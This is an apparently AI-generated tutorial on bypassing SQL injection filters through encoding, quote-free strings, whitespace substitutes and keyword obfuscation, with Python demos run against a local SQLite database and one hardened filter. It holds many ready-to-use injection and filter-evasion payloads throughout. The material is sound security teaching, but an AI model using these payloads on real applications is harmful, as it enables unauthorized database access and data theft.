Understanding SQL Injection Filter Evasion Techniques
This content is an AI-generated summary. If you encounter any misinformation or problematic content, please report it to cyb.hub@proton.me.
Modern web applications often implement defensive measures to sanitize or block common attack patterns, making simple SQL injection attempts ineffective. As penetration testers, we must adapt by using more sophisticated techniques to bypass these filters.
Key Points
- Character Encoding: Converting special characters in the SQL injection payload into encoded forms that may bypass input filters.
- No-Quote SQL Injection: Techniques to bypass filters that block single or double quotes.
- No Spaces Allowed: Methods to inject SQL when spaces are filtered out.
- Keyword Bypassing: Strategies to bypass filters that block common SQL keywords.
Character Encoding
Converting special characters in the payload into an encoded form can slip past a filter that inspects the raw request, provided a later layer (web server, framework, JSON parser) decodes the input back before it is concatenated into the query. Which layer decodes, and how many times, decides whether the technique works.
Encoding Techniques
- URL Encoding: the payload `' OR 1=1--` becomes `%27%20OR%201%3D1--`. The web server or framework decodes this before the application sees it, so one layer of encoding only defeats a filter that looks at the raw URL. Where the application decodes a second time itself, double encoding (`%2527%2520OR%25201%253D1--`) survives the first decode still encoded and is only unpacked at the query builder.
- Hexadecimal Encoding: on MySQL, `SELECT * FROM users WHERE name = 'admin'` can be written without any quote character as `SELECT * FROM users WHERE name = 0x61646d696e`, because a hex literal compares as the string it encodes in a string context.
- Unicode Encoding: the string `admin` becomes `\u0061\u0064\u006d\u0069\u006e`. SQL engines do not interpret this escape; it only helps when the application decodes it (for example from a JSON request body) before building the query.
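The decode-layer behaviour described above, as an added example (not code from the original page): it encodes the page's payload once and twice, applies a hypothetical raw-request quote filter, and shows what a query builder would receive after one and after two percent-decode passes. The filter, the payload constant and the layer labels are assumptions made for the demonstration; the hex and `\u` helpers produce the literals quoted in the text.

```python
import json
from urllib.parse import quote, unquote

# Constructed sample payload (the one quoted in the text above).
PAYLOAD = "' OR 1=1--"


def url_encode(payload: str) -> str:
    """Percent-encode everything except RFC 3986 unreserved characters."""
    return quote(payload, safe="")


def double_url_encode(payload: str) -> str:
    """Encode twice: the '%' of the first pass becomes '%25'."""
    return quote(url_encode(payload), safe="")


def mysql_hex_literal(value: str) -> str:
    """MySQL hex literal (0x61646d696e) that compares equal to the string
    'admin' in a string context, so no quote character is needed."""
    return "0x" + value.encode("utf-8").hex()


def unicode_escape(value: str) -> str:
    r"""\uXXXX escapes as a JSON or JavaScript parser would consume them."""
    return "".join(f"\\u{ord(ch):04x}" for ch in value)


def json_decoded(escaped: str) -> str:
    """What the application sees when the escaped value arrives in a JSON body."""
    return json.loads(f'"{escaped}"')


def naive_quote_filter(raw: str) -> bool:
    """Hypothetical filter inspecting the raw request: True means 'allowed'."""
    return "'" not in raw and '"' not in raw


def as_seen_after(raw: str, decode_passes: int) -> str:
    """Apply percent-decoding the given number of times (web server, then app)."""
    value = raw
    for _ in range(decode_passes):
        value = unquote(value)
    return value


def layer_matrix(payload: str) -> dict:
    """For single and double encoding: does the raw-string filter allow it, and
    what does the query builder receive after one and after two decode passes?"""
    out = {}
    for label, enc in (("single", url_encode(payload)),
                       ("double", double_url_encode(payload))):
        out[label] = {
            "allowed_by_raw_filter": naive_quote_filter(enc),
            "after_1_decode": as_seen_after(enc, 1),
            "after_2_decodes": as_seen_after(enc, 2),
        }
    return out


if __name__ == "__main__":
    for layer, info in layer_matrix(PAYLOAD).items():
        print(layer, info)
    print(mysql_hex_literal("admin"), unicode_escape("admin"))
```

The single-encoded payload passes the raw-string filter but arrives decoded after one pass, so a filter placed after the web server's decode catches it; the double-encoded payload is still percent-encoded after that first pass and only becomes the quote-bearing payload if the application decodes again.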
No-Quote SQL Injection
When the application rejects input containing quote characters, strips them, or escapes them (for example with `addslashes`), the injection has to work without a single or double quote:
Techniques
- Using Numerical Values: where the injected value sits in a numeric context (`WHERE id = 1`), quotes are never needed. Instead of `' OR '1'='1`, inject `1 OR 1=1`.
- Using SQL Comments: `--` starts a comment that discards the rest of the statement, so `admin'--` closes the string literal and truncates whatever followed it. Without the quote, `admin--` lands inside the literal (`WHERE name = 'admin--'`) and matches nothing; the comment only helps where the input is outside a quoted string, as in `WHERE id = 1-- `. MySQL requires whitespace after `--` (`#` also works there).
- Using CONCAT() or CHAR(): `CONCAT(0x61, 0x64, 0x6d, 0x69, 0x6e)` builds the string `admin` from hex literals on MySQL, and `CHAR(97,100,109,105,110)` builds it from code points, so a string value can be supplied in a no-quote position such as `WHERE id = 0 OR name = CHAR(97,100,109,105,110)`.
No Spaces Allowed
When the space character is rejected or stripped, any other token separator the SQL parser accepts will do:
Methods
- Comments to Replace Spaces: instead of `SELECT * FROM users WHERE name = 'admin'`, use `SELECT/**/*/**/FROM/**/users/**/WHERE/**/name/**/='admin'`. An empty comment is treated as whitespace between tokens.
- Tab or Newline Characters: `SELECT\t*\tFROM\tusers\tWHERE\tname\t=\t'admin'`.
- Alternate Characters: URL-encoded whitespace variants such as `%09` (horizontal tab), `%0A` (line feed), `%0C` (form feed), `%0D` (carriage return) and `%A0` (non-breaking space). Which of these the parser accepts is engine-specific: MySQL treats all of them as whitespace, while `%A0` is not whitespace to every engine and produces a syntax error where it is not.
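The no-quote and no-space techniques from the two sections above, run end to end as an added example (not code from the original page). An in-memory SQLite database stands in for MySQL, so the string value is built with `CHAR(code points)`, which both engines accept, rather than a `0x..` literal; the `users` table, the hypothetical filter that rejects quotes and ASCII spaces, and the payload set are constructed for the demonstration. It goes a little beyond the text: it also tries parentheses as separators and shows two failure modes, `admin--` inside a string literal and `%A0` on an engine that does not treat it as whitespace.

```python
import sqlite3


# Constructed users table; SQLite stands in for MySQL in this example.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "superuser"), (2, "alice", "user")])
    return conn


def naive_filter(fragment: str) -> None:
    """Hypothetical input filter: rejects quote characters and the ASCII space."""
    if any(c in fragment for c in ("'", '"', " ")):
        raise ValueError("rejected by filter")


def vulnerable_by_name(conn, fragment: str):
    """String context: the input lands inside a quoted literal."""
    naive_filter(fragment)
    sql = "SELECT id, name, role FROM users WHERE name = '" + fragment + "'"
    return conn.execute(sql).fetchall()


def vulnerable_by_id(conn, fragment: str):
    """Numeric context: the input is concatenated without quotes."""
    naive_filter(fragment)
    sql = "SELECT id, name, role FROM users WHERE id = " + fragment
    return conn.execute(sql).fetchall()


def probe(conn, fragment: str, context: str = "id"):
    """Return the sorted names a payload retrieves, or the exception class name
    when either the filter or the SQL parser rejects it."""
    try:
        fn = vulnerable_by_id if context == "id" else vulnerable_by_name
        return sorted(row[1] for row in fn(conn, fragment))
    except (ValueError, sqlite3.OperationalError) as exc:
        return type(exc).__name__


# Constructed payloads, grouped by technique (numeric context unless noted).
PAYLOADS = {
    "baseline": "1 OR 1=1",                      # contains spaces: filtered
    "comment separators": "1/**/OR/**/1=1--",
    "tab": "1\tOR\t1=1",
    "line feed": "1\nOR\n1=1",
    "form feed": "1\x0cOR\x0c1=1",
    "carriage return": "1\rOR\r1=1",
    "non-breaking space": "1\xa0OR\xa01=1",      # MySQL accepts; SQLite does not
    "parentheses": "(1)OR(1=1)",
    "no-quote string": "0/**/OR/**/name=CHAR(97,100,109,105,110)",
}


def run_all(conn) -> dict:
    results = {label: probe(conn, p) for label, p in PAYLOADS.items()}
    # String context: with no quote to close the literal, admin-- is just a name.
    results["comment without quote (string context)"] = probe(conn, "admin--", "name")
    return results


if __name__ == "__main__":
    for label, outcome in run_all(make_db()).items():
        print(f"{label:40s} {outcome}")
```

Every whitespace substitute that the parser recognises returns both rows, `CHAR()` retrieves the `admin` row without a quote anywhere in the payload, and the two failure cases come back empty or as a parser error rather than as a bypass.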
Keyword Bypassing
Strategies to bypass filters that block common SQL keywords:
Strategies
| Scenario | Description | Example |
|---|---|---|
| Keywords like SELECT are banned by a case-sensitive match | Vary the case, or separate keywords with comments instead of whitespace so that rules expecting `UNION SELECT` do not match. Splitting a keyword itself with a comment (`SE/**/LECT`) is parsed as two tokens by current MySQL and MSSQL and fails; on MySQL a version-conditional comment keeps the keyword executable while filters that discard comment bodies lose it. | `SElEcT * FrOm users`, `UNION/**/SELECT`, `/*!50000SELECT*/` |
| Spaces are banned | Replace spaces with alternative whitespace characters or empty comments. | `SELECT%0A*%0AFROM%0Ausers` or `SELECT/**/*/**/FROM/**/users` |
| Logical operators like AND, OR are banned | MySQL accepts `&&` and `\|\|` as AND and OR (unless `PIPES_AS_CONCAT` is set); in PostgreSQL and Oracle `\|\|` is string concatenation, not OR. | `username = 'admin' && password = 'password'` or `id = 1 \|\| 1=1` |
| String values or quotes are banned | Build the value with a hex literal, `CHAR()` or `CONCAT()`. This encodes values, not keywords: SQL does not decode hex or Unicode escapes into keywords, so a banned `SELECT` can only be hidden at the transport layer (for example double URL encoding, `%2553ELECT`, when the application decodes twice). | `SELECT * FROM users WHERE username = CHAR(0x61,0x64,0x6D,0x69,0x6E)` or `... = CONCAT('a','d','m','i','n')` |
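The keyword-filter rows of the table above, as an added example (not code from the original page) that shows both sides: a hypothetical case-sensitive blocklist as a naive filter might implement it, the evasions that get past it, and a normalisation step a hardened filter applies before matching (comment handling, whitespace folding, `&&`/`||` mapping, case folding). The rule set and the payloads are constructed for the demonstration; the last payload shows that a value encoded with `CHAR()` contains no keyword for either filter to match, which is why keyword blocklists are not a substitute for parameterised queries.

```python
import re

# Hypothetical blocklist, as a naive filter or WAF rule set might implement it.
NAIVE_RULES = [r"\bSELECT\b", r"\bUNION\s+SELECT\b", r"\bOR\b", r"\bAND\b"]


def naive_blocked(payload: str) -> bool:
    """Case-sensitive match on the raw input; only whitespace separates keywords."""
    return any(re.search(rule, payload) for rule in NAIVE_RULES)


def normalise(payload: str) -> str:
    """Pre-processing a hardened filter applies before matching: keep the body of
    MySQL /*! ... */ conditional comments (the server executes it), drop ordinary
    comment bodies, collapse every whitespace variant, map && and || onto the
    keywords MySQL treats them as, and fold case."""
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", payload, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    s = re.sub(r"\s+", " ", s).strip()   # \s covers tab, LF, FF, CR and U+00A0
    s = s.replace("&&", " AND ").replace("||", " OR ")
    return s.upper()


def hardened_blocked(payload: str) -> bool:
    """Same rule set, applied to the normalised form."""
    return naive_blocked(normalise(payload))


# Constructed payloads, one per evasion discussed in the table.
PAYLOADS = {
    "plain": "1 OR 1=1",
    "mixed case": "1 oR 1=1",
    "comment separators": "1/**/oR/**/1=1",
    "conditional comment": "1 /*!oR*/ 1=1",
    "alternative operator": "1 || 1=1",
    "encoded value only": "name=CHAR(97,100,109,105,110)",
}


def report() -> dict:
    """(naive_blocked, hardened_blocked) for every payload."""
    return {label: (naive_blocked(p), hardened_blocked(p))
            for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    for label, (naive, hardened) in report().items():
        print(f"{label:22s} naive={naive!s:5s} hardened={hardened}")
```

The normaliser keeps the body of `/*! ... */` rather than deleting all comments outright; a filter that strips every comment would turn `1 /*!oR*/ 1=1` into `1 1=1` and miss a payload MySQL will happily execute.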
Learn More
To further enhance your understanding of SQL injection filter evasion techniques, consider exploring the following resources:
- OWASP SQL Injection Prevention Cheat Sheet: A comprehensive guide on preventing SQL injection attacks.
- SQL Injection Attack and Defense: A detailed book covering various aspects of SQL injection and defense mechanisms.
- Penetration Testing Labs: Practical labs and exercises to test and improve your SQL injection skills.